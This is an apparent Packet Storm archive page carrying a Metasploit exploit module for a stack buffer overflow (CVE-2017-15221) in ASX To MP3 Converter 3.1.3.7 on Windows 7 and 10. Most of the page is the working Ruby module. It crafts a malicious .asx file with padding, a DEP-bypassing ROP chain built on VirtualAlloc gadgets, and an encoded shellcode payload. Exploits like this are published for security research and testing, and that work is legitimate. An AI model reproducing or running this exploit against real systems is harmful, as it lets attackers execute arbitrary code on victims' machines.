exploit the possibilities

ASX To MP3 Converter 3.1.3.7 Stack Overflow

ASX To MP3 Converter 3.1.3.7 Stack Overflow
Posted Oct 10, 2019
Authored by Maxim Guslyaev | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7. By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the application, a buffer is overwritten, which allows for running shellcode. Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC.

tags | exploit, overflow, shellcode
systems | windows, 7
advisories | CVE-2017-15221
MD5 | 56c0508be45bebf5e6af39311de96c27

ASX To MP3 Converter 3.1.3.7 Stack Overflow

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info={})
super(update_info(info,
'Name' => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
'Description' => %q{
This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7.
By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the
application, a buffer is overwritten, which allows for running shellcode.
Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC
},
'License' => MSF_LICENSE,
'Author' =>
[
'Maxim Guslyaev', # EDB POC, Metasploit Module
],
'References' =>
[
[ 'CVE', '2017-15221' ],
[ 'EDB', '47468' ]
],
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 Enterprise/10 Pro',
{
'Ret' => 0x1002D038 # RET
}
]
],
'Payload' =>
{
'BadChars' => "\x00\x09\x0a"
},
'Privileged' => false,
'DisclosureDate' => "Oct 06 2019",
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
])
end

def exploit

buf = "http://"
buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"

## Save allocation type (0x1000) in EDX
buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
buf += [0x11111111].pack("V")
buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN
buf += [0x1002D493].pack("V") # POP EDX # RETN
buf += [0xEEEEFEEF].pack("V")
buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
buf += [0x41414141].pack("V")

## Save the address of VirtualAlloc() in ESI
buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
buf += [0x41414141].pack("V")
buf += [0x41414141].pack("V")

## Save the size of the block in EBX
buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN

## Save the address of (# ADD ESP,8 # RETN) in EBP
buf += [0x10031c6c].pack("V") # POP EBP # RETN
buf += [0x10012316].pack("V") # ADD ESP,8 # RETN
#buf += [0x1003df73].pack("V") # & PUSH ESP # RETN

## Save memory protection code (0x40) in ECX
buf += [0x1002ca22].pack("V") # POP ECX # RETN
buf += [0xFFFFFFFF].pack("V")
buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN

## Save ROP-NOP in EDI
buf += [0x1002e346].pack("V") # POP EDI # RETN
buf += [0x1002D038].pack("V") # RETN

## Save NOPs in EAX
#buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
#buf += [0x90909090].pack("V") # nop

## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
buf += [0x1002E516].pack("V") # POP EAX # RETN
buf += [0xA4E2F275].pack("V")
buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN
buf += [0x10040ce5].pack("V") # PUSH EAX # RETN

buf += "\x90" * 4
buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
buf += "\x90" * 20
buf += payload.encoded

file_create(buf)

end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close